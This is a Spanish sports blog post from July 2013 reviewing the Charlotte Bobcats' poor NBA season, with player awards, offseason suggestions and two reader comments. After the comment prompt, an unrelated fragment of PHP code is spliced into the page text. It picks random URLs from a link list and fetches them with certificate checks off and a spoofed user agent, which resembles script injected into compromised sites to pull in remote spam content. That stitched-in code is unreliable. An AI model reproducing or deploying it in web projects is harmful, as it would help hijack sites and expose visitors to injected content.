Charlotte Bobcats: Muy deficiente

05 de July de 2013 por TheDeerHunter

Decía mi madre que “quien hace lo que puede no está obligado a más”. Sin embargo la frase nunca me sirvió de atenuante si llegaba con algún suspenso a casa. La “trampa” parte de la relación aptitud-actitud que en tantas ocasiones se hace tan difícil de medir. En el caso de los Bobcats podemos ponernos de acuerdo con sus precarias aptitudes. A uno de los peores equipos de la historia deportiva se incorporaban durante el verano pasado fichajes de la talla de Ben Gordon, Brendan Haywood o Ramon Sessions. ¿Es justo que sobre estos mimbres se les exija algo más allá de quedar últimos? Discutible.

Volviendo al factor actitud. Los Bobcats únicamente superaron el 50% de victorias en una ocasión. ¿Qué hicieron entonces? Reconstruir, por supuesto. ¿En cuantas ocasiones el objetivo a mitad de curso se convirtió en acumular el máximo número de derrotas posibles para posicionarse en la lotería? Es asombroso que de la falta de actitud se haga política de club. El “tankeo” como modo de vida. Tampoco es que se hayan caracterizado ni por tener suerte en los sorteos ni especial acierto en las elecciones.

Lo que sí han logrado mediante esa vía es espantar a todo agente libre que no tenga la pasta como principal motivación, sobrepagando escandalosamente lo que consiguen incorporar o retener. El top 3 salarial de este año lo forman los $12,4M de Ben Gordon (ningún partido de titular), los $8M para Tyrus Thomas (26 partidos disputados, 14 minutos de promedio) y los $7,5M de DeSagana Diop que sí, sigue vivo. Sobran comentarios. 

Lo normal es que hubieran terminado últimos, con el enésimo balance humillante. Están entre lo peor de la liga en cualquier categoría medible (como también en las no-medibles) y como no pueden despedir a todo el mundo, el próximo curso estrenarán el 6º entrenador jefe desde 2007. Visto lo visto, su principal función será la de cabeza de turco por sus previsibles malos resultados. Ni Auerbach podría sacarles de pobres…

Esforzándonos por ser positivos, este año no han pulverizado ningún récord de inutilidad. Han triplicado el número de victorias anterior (aunque suene a chiste) y en algún momento puntual mostraron detalles para la esperanza. Kemba Walker se ha consolidado como un líder convincente, Kidd-Gildchrist ha demostrado ser una elección sólida (aunque no brillante) y han logrado juntar un quinteto más o menos reconocible junto a Henderson, Biyombo y Mullens. También podemos destacar el rendimiento digno de los ex Lakers Sessions y McRoberts desde el banco. El sorprendente pick 4 con Cody Zeller parece prevenir la previsible salida de Mullens. De momento no ha causado demasiado furor en Charlotte, aunque si lo que buscan es anotación interior hay quien asegura que puede darla.

Así que los Bobcats se presentan en la offseason del 2013 con mucho por hacer, tras una interminable travesía de sinsabores. El hecho de que nadie esperara nada positivo de ellos no quita que merezcan la peor de las valoraciones, con una política absolutamente equivocada que no conduce más que al pozo eterno de la liga.

PREMIOS

MVP: Kemba Walker se ha ganado a pulso su puesto de titular en este equipo. Casi 18 puntos, 6 asistencias y dos robos, con el único pero del acierto en el tiro pero para mejorarlo también necesita compañeros que puedan amenazar por si mismos.

Rookie: Michael Kidd-Gilchrist ha sido unánimemente considerado como uno de los mejores rookies de su hornada. Con unas cualidades eminentemente defensivas quizá no es tan brillante como para justificar el pick 2 pero sí lo suficientemente sólido como para convertirse en fundamental desde que aterrizó.

Sorpresa: Tras su desafortunado paso por Lakers tanto Ramon Sessions como Josh McRoberts han ofrecido minutos de calidad. También debemos rescatar una debilidad personal que se ha hecho imprescindible para ellos, Bismack Biyombo.

Decepción: Parece confirmarse que Byron Mullens no seguirá. No es que lo haya hecho terriblemente mal, pero en su año de renovación se le ha notado peligrosamente estancado. Mayor responsabilidad, menor efectividad.

Esfuerzo en vano: Económico. Podrían haberme pagado a mí el pastizal de DeSagana. Hubiera sido igual de nulo, pero hubiera quedado mejor en las fotos.

JUGANDO A GM

– ¡Albrícias, DeSagana acaba contrato! Habrá que ofrecerle una jugosa renovación de pongamos 12 kilos por añito de relax… Obviamente es coña. En un mundo con mínima lógica estaríamos hablando del final de una estupendamente rentable (para él) carrera. Previsiblemente Reggie Williams tampoco volverá al equipo.

– Se rumorea aplicar amnistía a Tyrus Thomas con la intención de apostar fuerte por Al Jefferson. Desconocemos si Big Al terminará recalando allí debido a la variedad de ofertas que debe de estar deshojando pero lógicamente nos parece perfecta la primera parte de la premisa. (Actualización: Como siempre al quite, nuestros visitantes informaban puntualmente del fichaje ayer tarde. 41M€ en tres campañas. Como intuíamos no será una ganga si no lo comparamos con el propio Tyrus, pero algo tienen que hacer para atraer agentes libres de talento y esto rompe con la política nefasta que criticábamos)

– Por desgracia no pueden amnistiar también a Ben Gordon, que como es comprensible ejercerá su player option por encima de los 13 kilos. En la medida de lo posible yo directamente lo apartaría del equipo hasta encontrarle destino. Es un expiring que se podría colocar bien próximamente.

– Se puede optar a la renovación tanto de Gerald Henderson como la de Josh McRoberts si no se suben demasiado a la parra salarialmente. De momento ya han ejercido la qualiffing offer sobre el segundo.

– Se oyó decir que Antawn Jamison quería volver a casa (Carolina del Norte) a terminar su carrera. Teóricamente 2-3 años de contrato por el mínimo. Habría que definir muy bien qué papel cumpliría en el equipo. La veteranía de un jugador como él puede ser una aportación valiosa para los jóvenes pero el tema puede degenerar si su ego no soporta un rol prácticamente intrascendente en la pista.

(Actualizado) Firmado Jefferson es imprescindible dotar al equipo de dinamita por fuera, preferiblemente un escolta si no se tiene en cuenta a Gordon. Antes de que los sucesivos fichajes nos fueran atropellando habíamos pensado en gente como Kevin Martin o Marco Bellinelli, relativamente asequibles económicamente y que podrían funcionar en aquel contexto sin grandes pretensiones inmediatas. Llegados a este punto consideramos que Nick Young podría dar el perfil con su talento desubicado. Rizando el rizo podrían tirar la casa por la ventana tentando también a Dorell Wright, quien ha perdido cotización en los últimos tiempos y que podría combinarse de manera  interesante con el versátil Kidd-Gildchrist.

Así podría perfilar esta plantilla llamada a subir unas cuantas posiciones en el este:

PG: Walker, Sessions
SG: Henderson, Young, Ben Gordon
SF: Kidd-Gildchrist, Dorell Wright, Jeffery Taylor
PF: Al Jefferson, Biyombo
C: Cody Zeller, Brendan Haywood

Comenta

2 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Creo que Gordon ya hizo público hace unos días que ejercía su player option. Nos ha jodido… empezó muy bien la temporada, con unos primeros meses hasta el all-star donde llegó a ser la principal arma ofensiva del equipo desde el banco, pero a partir del all-star su descalabro fue mayúsculo, y al final entre lesiones y que el entrenador no confió en él y solo jugaba 10-15 minutos por partido, terminó la temporada de manera mediocre. Y es una lástima, porque es un anotador que en días inspirados se fue el año pasado a casi 30 puntos en 25 minutos o así. No sé, tampoco es una mala posición la del escolta con Henderson+Gordon. Me gusta cómo han armado la zona, con dos jugadores diametralmente opuestos como Jefferson y Zeller, pero que vienen a ayudar a Biyombo, solísimo el año pasado. Si a eso añadimos la mejora de Gilchrist acompañado por mejores jugadores, al menos el próximo año deberían intentar irse a las 30 victorias, aunque la opción de seguir tankeando les pone burros, jejee.

    No sé, realmenet el problema de este equipo no es el quinteto, porque con AL van a armar un buen quinteto que ya quisieran tener muchos equipos en la NBA. El problema de los Bobcats es que no hay profundidad de banquillo. Por Tyrus Thomas podrían tener un par de jugadores para rellenar la zona y dar descansos a Gilchrist (aunque Taylor no lo hizo mal el año pasado). A ver si pujan por algún jugador más

      Citar

  2. Ruxixón dice:
    #2

    Pues que a mí me gusto el Mullens de primera miad de la temporada xDDD

    Un error despedir a Dunlap.Simplemente por la cara que dio el equipo en ese inicio,ganando algún que otro partido y perdiendo varios por escaso margen,pecados de juventud,se merecía seguir,total no hay prisas.

    Vamos a ver porque en principio mejorarán,algo que no es difícil,pero es que si se ponen a pensarlo los PO en el este son un regalo.Si siempre se ha considerado así este año todavía muchísimo más.Es que a lo tonto se pueden meter en PO con balance negativo y al año siguiente con 3 rondas de draft.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>